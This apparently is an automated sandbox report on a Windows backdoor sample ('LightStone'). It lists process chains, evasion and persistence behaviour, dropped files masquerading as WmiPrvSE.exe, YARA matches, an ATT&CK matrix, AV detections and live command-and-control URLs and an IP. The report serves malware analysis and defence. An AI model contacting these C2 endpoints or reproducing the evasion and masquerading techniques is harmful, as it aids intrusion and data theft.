                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exe TID: 7088Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\PerfLogs\KQihinlofznONtA.exe TID: 3320Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exe TID: 6856Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exe TID: 6856Thread sleep time: -600000s >= -30000sJump to behavior
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exe TID: 6856Thread sleep time: -599891s >= -30000sJump to behavior
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exe TID: 6640Thread sleep count: 399 > 30Jump to behavior
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exe TID: 6856Thread sleep time: -599781s >= -30000sJump to behavior
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exe TID: 6928Thread sleep time: -30000s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exe TID: 7064Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exe TID: 6600Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exe TID: 6600Thread sleep time: -600000s >= -30000s
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exe TID: 6600Thread sleep time: -599891s >= -30000s
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exe TID: 6600Thread sleep time: -599782s >= -30000s
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exe TID: 6832Thread sleep time: -30000s >= -30000s
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\PerfLogs\KQihinlofznONtA.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeThread delayed: delay time: 600000Jump to behavior
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeThread delayed: delay time: 599891Jump to behavior
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeThread delayed: delay time: 599781Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeThread delayed: delay time: 922337203685477
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeThread delayed: delay time: 922337203685477
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeThread delayed: delay time: 600000
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeThread delayed: delay time: 599891
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeThread delayed: delay time: 599782
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeWindow / User API: threadDelayed 399Jump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\PerfLogs\KQihinlofznONtA.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeThread delayed: delay time: 600000Jump to behavior
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeThread delayed: delay time: 599891Jump to behavior
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeThread delayed: delay time: 599781Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeThread delayed: delay time: 922337203685477
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeThread delayed: delay time: 922337203685477
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeThread delayed: delay time: 600000
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeThread delayed: delay time: 599891
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeThread delayed: delay time: 599782
                        Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exeAPI call chain: ExitProcess graph end nodegraph_0-24378
                        Source: w32tm.exe, 0000000D.00000002.1790765005.0000019D56429000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllu
                        Source: HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe, 00000000.00000003.1633710127.00000000006C5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}')"
                        Source: HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe, 00000000.00000003.1634732567.00000000006C5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\y,*'
                        Source: WmiPrvSE.exe, 00000012.00000002.2530502955.0000000000EF2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                        Source: WmiPrvSE.exe, 00000009.00000002.1760364572.0000000000D86000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllLL
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeProcess information queried: ProcessInformationJump to behavior
                        Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exeCode function: 0_2_007EDD72 VirtualQuery,GetSystemInfo,0_2_007EDD72
                        Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exeCode function: 0_2_007DA5F4 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_007DA5F4
                        Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exeCode function: 0_2_007EB8E0 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_007EB8E0
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\PerfLogs\KQihinlofznONtA.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeFile Volume queried: C:\ FullSizeInformation
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeFile Volume queried: C:\ FullSizeInformation
                        Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exeCode function: 0_2_007F753D mov eax, dword ptr fs:[00000030h]0_2_007F753D
                        Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exeCode function: 0_2_007F866F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_007F866F
                        Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exeCode function: 0_2_007FB710 GetProcessHeap,0_2_007FB710
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\PerfLogs\KQihinlofznONtA.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeProcess token adjusted: Debug
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeMemory allocated: page read and write | page guardJump to behavior
                        Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exeCode function: 0_2_007EF063 SetUnhandledExceptionFilter,0_2_007EF063
                        Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exeCode function: 0_2_007EF22B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_007EF22B
                        Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exeCode function: 0_2_007F866F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_007F866F
                        Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exeCode function: 0_2_007EEF05 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_007EEF05
                        Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Adobe\sN8j8UtUmLUEbzv.vbe" Jump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Adobe\87tDm8T1lOvAjdSEmWMIMA3JTpcTMB.bat" "Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\Adobe\hui.exe C:\Users\user\AppData\Roaming\Adobe\hui.exeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\zoUR8TSZV2.bat" Jump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 Jump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\Adobe\hui.exe "C:\Users\user\AppData\Roaming\Adobe\hui.exe" Jump to behavior
                        Source: hui.exe, 00000004.00000002.1741908323.0000000002521000.00000004.00000800.00020000.00000000.sdmp, KQihinlofznONtA.exe, 00000008.00000002.1816721235.0000000002A91000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000009.00000002.1760913066.0000000002931000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                        Source: hui.exe, 00000004.00000002.1741908323.0000000002521000.00000004.00000800.00020000.00000000.sdmp, KQihinlofznONtA.exe, 00000008.00000002.1816721235.0000000002A91000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000009.00000002.1760913066.0000000002931000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                        Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_007EA63C
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeQueries volume information: C:\Users\user\AppData\Roaming\Adobe\hui.exe VolumeInformationJump to behavior
                        Source: C:\PerfLogs\KQihinlofznONtA.exeQueries volume information: C:\PerfLogs\KQihinlofznONtA.exe VolumeInformationJump to behavior
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeQueries volume information: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exe VolumeInformationJump to behavior
                        Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeQueries volume information: C:\Users\user\AppData\Roaming\Adobe\hui.exe VolumeInformation
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeQueries volume information: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exe VolumeInformation
                        Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exeCode function: 0_2_007EED5B cpuid 0_2_007EED5B
                        Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                        Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exeCode function: 0_2_007ED5D4 GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,0_2_007ED5D4
                        Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exeCode function: 0_2_007DACF5 GetVersionExW,0_2_007DACF5

                        Stealing of Sensitive Information

                        barindex
                        Source: Yara matchFile source: 00000008.00000002.1816721235.0000000002AFB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000009.00000002.1760913066.000000000299D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000009.00000002.1760913066.0000000002931000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.1816721235.0000000002A91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.1741908323.0000000002521000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.1741908323.000000000258D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: hui.exe PID: 7000, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: KQihinlofznONtA.exe PID: 5084, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: WmiPrvSE.exe PID: 4136, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: hui.exe PID: 5664, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: WmiPrvSE.exe PID: 6476, type: MEMORYSTR

                        Remote Access Functionality

                        barindex
                        Source: Yara matchFile source: 00000008.00000002.1816721235.0000000002AFB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000009.00000002.1760913066.000000000299D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000009.00000002.1760913066.0000000002931000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.1816721235.0000000002A91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.1741908323.0000000002521000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.1741908323.000000000258D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: hui.exe PID: 7000, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: KQihinlofznONtA.exe PID: 5084, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: WmiPrvSE.exe PID: 4136, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: hui.exe PID: 5664, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: WmiPrvSE.exe PID: 6476, type: MEMORYSTR
                        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                        Valid Accounts11
                        Windows Management Instrumentation
                        1
                        Scheduled Task/Job
                        12
                        Process Injection
                        13
                        Masquerading
                        OS Credential Dumping1
                        System Time Discovery
                        Remote Services11
                        Archive Collected Data
                        Exfiltration Over Other Network Medium1
                        Encrypted Channel
                        Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                        Default Accounts2
                        Command and Scripting Interpreter
                        21
                        Registry Run Keys / Startup Folder
                        1
                        Scheduled Task/Job
                        1
                        Disable or Modify Tools
                        LSASS Memory121
                        Security Software Discovery
                        Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth3
                        Ingress Tool Transfer
                        Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                        Domain Accounts1
                        Scheduled Task/Job
                        1
                        DLL Side-Loading
                        21
                        Registry Run Keys / Startup Folder
                        21
                        Virtualization/Sandbox Evasion
                        Security Account Manager2
                        Process Discovery
                        SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration3
                        Non-Application Layer Protocol
                        Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                        Local Accounts11
                        Scripting
                        Logon Script (Mac)1
                        DLL Side-Loading
                        12
                        Process Injection
                        NTDS21
                        Virtualization/Sandbox Evasion
                        Distributed Component Object ModelInput CaptureScheduled Transfer113
                        Application Layer Protocol
                        SIM Card SwapCarrier Billing Fraud
                        Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script11
                        Deobfuscate/Decode Files or Information
                        LSA Secrets1
                        Application Window Discovery
                        SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                        Replication Through Removable MediaLaunchdRc.commonRc.common11
                        Scripting
                        Cached Domain Credentials2
                        File and Directory Discovery
                        VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                        External Remote ServicesScheduled TaskStartup ItemsStartup Items3
                        Obfuscated Files or Information
                        DCSync37
                        System Information Discovery
                        Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                        Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job21
                        Software Packing
                        Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                        Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
                        DLL Side-Loading
                        /etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1337252 Sample: HEUR-Backdoor.MSIL.LightSto... Startdate: 05/11/2023 Architecture: WINDOWS Score: 100 57 host1835875.hostland.pro 2->57 59 Found malware configuration 2->59 61 Malicious sample detected (through community Yara rule) 2->61 63 Antivirus detection for dropped file 2->63 65 11 other signatures 2->65 11 HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe 3 10 2->11         started        15 KQihinlofznONtA.exe 3 2->15         started        17 WmiPrvSE.exe 14 3 2->17         started        20 4 other processes 2->20 signatures3 process4 dnsIp5 43 C:\Users\user\AppData\Roaming\Adobe\hui.exe, PE32 11->43 dropped 45 C:\Users\user\AppData\...\sN8j8UtUmLUEbzv.vbe, data 11->45 dropped 69 Drops executable to a common third party application directory 11->69 22 wscript.exe 1 11->22         started        71 Antivirus detection for dropped file 15->71 73 Multi AV Scanner detection for dropped file 15->73 75 Machine Learning detection for dropped file 15->75 55 host1835875.hostland.pro 185.26.122.79, 49729, 49736, 80 HOSTLANDRU Russian Federation 17->55 file6 signatures7 process8 signatures9 67 Windows Scripting host queries suspicious COM object (likely to drop second stage) 22->67 25 cmd.exe 1 22->25         started        process10 process11 27 hui.exe 7 12 25->27         started        31 conhost.exe 25->31         started        file12 47 C:\Program Files\...\WmiPrvSE.exe, PE32 27->47 dropped 49 C:\PerfLogs\WmiPrvSE.exe, PE32 27->49 dropped 51 C:\PerfLogs\KQihinlofznONtA.exe, PE32 27->51 dropped 53 C:\Users\user\AppData\...\zoUR8TSZV2.bat, DOS 27->53 dropped 77 Antivirus detection for dropped file 27->77 79 Multi AV Scanner detection for dropped file 27->79 81 Creates an undocumented autostart registry key 27->81 83 3 other signatures 27->83 33 cmd.exe 1 27->33         started        signatures13 process14 process15 35 conhost.exe 33->35         started        37 chcp.com 33->37         started        39 w32tm.exe 33->39         started        41 hui.exe 33->41         started       

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand
                        SourceDetectionScannerLabelLink
                        HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe68%ReversingLabsByteCode-MSIL.Trojan.SpyNoon
                        HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe66%VirustotalBrowse
                        HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe100%AviraVBS/Runner.VPG
                        HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe100%Joe Sandbox ML
                        SourceDetectionScannerLabelLink
                        C:\Users\user\AppData\Roaming\Adobe\hui.exe100%AviraHEUR/AGEN.1323343
                        C:\Users\user\AppData\Roaming\Adobe\sN8j8UtUmLUEbzv.vbe100%AviraVBS/Runner.VPG
                        C:\PerfLogs\WmiPrvSE.exe100%AviraHEUR/AGEN.1323343
                        C:\Users\user\AppData\Local\Temp\zoUR8TSZV2.bat100%AviraBAT/Runner.rghmi
                        C:\PerfLogs\KQihinlofznONtA.exe100%AviraHEUR/AGEN.1323343
                        C:\PerfLogs\WmiPrvSE.exe100%AviraHEUR/AGEN.1323343
                        C:\Users\user\AppData\Roaming\Adobe\hui.exe100%Joe Sandbox ML
                        C:\PerfLogs\WmiPrvSE.exe100%Joe Sandbox ML
                        C:\PerfLogs\KQihinlofznONtA.exe100%Joe Sandbox ML
                        C:\PerfLogs\WmiPrvSE.exe100%Joe Sandbox ML
                        C:\PerfLogs\KQihinlofznONtA.exe88%ReversingLabsByteCode-MSIL.Backdoor.LightStone
                        C:\PerfLogs\KQihinlofznONtA.exe61%VirustotalBrowse
                        C:\PerfLogs\WmiPrvSE.exe88%ReversingLabsByteCode-MSIL.Backdoor.LightStone
                        C:\PerfLogs\WmiPrvSE.exe61%VirustotalBrowse
                        C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exe88%ReversingLabsByteCode-MSIL.Backdoor.LightStone
                        C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exe61%VirustotalBrowse
                        C:\Users\user\AppData\Roaming\Adobe\hui.exe88%ReversingLabsByteCode-MSIL.Backdoor.LightStone
                        C:\Users\user\AppData\Roaming\Adobe\hui.exe61%VirustotalBrowse
                        No Antivirus matches
                        No Antivirus matches
                        No Antivirus matches
                        NameIPActiveMaliciousAntivirus DetectionReputation
                        host1835875.hostland.pro
                        185.26.122.79
                        truefalse
                          high
                          NameMaliciousAntivirus DetectionReputation
                          http://host1835875.hostland.pro/Lowlongpolltest.php?vsUBxK4ppQZ8aDT8iyUE4KfcwtSFC=9aubHCzwLXJHHcAcgf54Zhii&lN2OD2zm5Q9N95QIwn65xDDbUNxJIVc=Lcgz7hIfUeMLBOgjpwm4mnLiJb4z&3998e4b767cc58057b788963dc557b0a=79a349ba785d906a76eb09f6c1191279&a186b4e8b8ab60f6ea84885b889965cc=QMzcTNzIWZ1UjM5Y2MhlzMmNTNxQ2YkF2M4cTZwgTMwMjNjFzNxkzM&vsUBxK4ppQZ8aDT8iyUE4KfcwtSFC=9aubHCzwLXJHHcAcgf54Zhii&lN2OD2zm5Q9N95QIwn65xDDbUNxJIVc=Lcgz7hIfUeMLBOgjpwm4mnLiJb4zfalse
                            high
                            http://host1835875.hostland.pro/@0NXZ0xGbvB3Zu9Gb39GTfalse
                              high
                              http://host1835875.hostland.pro/Lowlongpolltest.php?fpx0A0VKNNT3jT2dNBkuvNR98C5s=1yQEvZAPO2s&3998e4b767cc58057b788963dc557b0a=79a349ba785d906a76eb09f6c1191279&a186b4e8b8ab60f6ea84885b889965cc=QMzcTNzIWZ1UjM5Y2MhlzMmNTNxQ2YkF2M4cTZwgTMwMjNjFzNxkzM&fpx0A0VKNNT3jT2dNBkuvNR98C5s=1yQEvZAPO2sfalse
                                high
                                NameSourceMaliciousAntivirus DetectionReputation
